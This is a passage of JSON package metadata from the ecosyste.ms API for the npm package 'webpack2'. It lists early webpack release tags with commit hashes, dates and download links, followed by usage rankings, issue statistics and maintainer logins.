osyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:16:06.888Z","dependent_packages_count":12,"downloads":36,"downloads_period":"last-month","dependent_repos_count":27,"rankings":{"downloads":22.982767659723276,"dependent_repos_count":2.4071239660435793,"dependent_packages_count":1.7796504254089736,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":5.528062490631875},"purl":"pkg:npm/webpack2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack2/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/